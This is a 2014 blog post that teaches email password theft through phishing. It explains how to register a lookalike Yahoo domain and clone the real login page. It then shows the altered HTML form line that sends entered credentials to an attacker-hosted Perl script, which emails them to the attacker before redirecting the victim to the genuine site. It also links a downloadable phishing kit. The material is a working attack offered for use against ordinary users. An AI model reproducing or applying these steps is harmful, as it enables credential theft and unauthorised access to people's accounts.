Friday 28 March 2014

How to Hack Email Passwords ?

How to Hack Email Passwords ?

Hi all users, today I'm gonna teach you how to hack passwords of e-mail addresses, there are many diffrent methods are available to hack e-mail like Remote File Inclusion, Local File Inclusion, Shoulder Surfing, Brute-Forcing etc. The other trick that is most commonly used to hack email password is using Fake Login Pages (phishing), Fake login pages are the most widely used techniques to hack an email account. A Fake Login page is a page that appears exactly as a Login page but once we enter our password there, we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.
However creating a fake login page and taking it online to successfully hack an email account is not an easy job How to Hack Yahoo/gmail/orkut any Password?

Requirement:

Just purchase hosting from any company and the domain will be similar to yahoomail.com
like yahooomail.com after upload 3 files.

1. index.html (same clone of the yahoo.com)—just change method

2. info.pl (used to send passwords to our email address)

3. thankyou.htm file to redirect phishing page to orginal yahoomail.com .

open yahoomail.com and save as file index.html open this file in notepad and

Search method and change this line to:

Original Line:

<form method="post" action="https://login.yahoo.com/config/login?"
autocomplete="off" name="login_form" onsubmit="return hash2(this)">


New Line:

<form method="post" action="http://ourwebsite.com/info.pl" name="login_form">
And after save and upload to ourwebsite like( www.yahooomail.com)
And edit info.pl to:
my $HTML_thankyou = 'http://www.yahoomail.com/thankyou.htm';
my $to = 'myemail@yaho.com;
my $from = 'mail@yahooomail.com';
and also edit thankyou.html:
code to:
<meta http-equiv="refresh" content="3; url=https://login.yahoo.com/config/login?">
upload and set 777 permission on info.pl
Download: www.thesecretofhacking.com/sw/ch5/phising.rar

Enjoy.......

No comments:

Post a Comment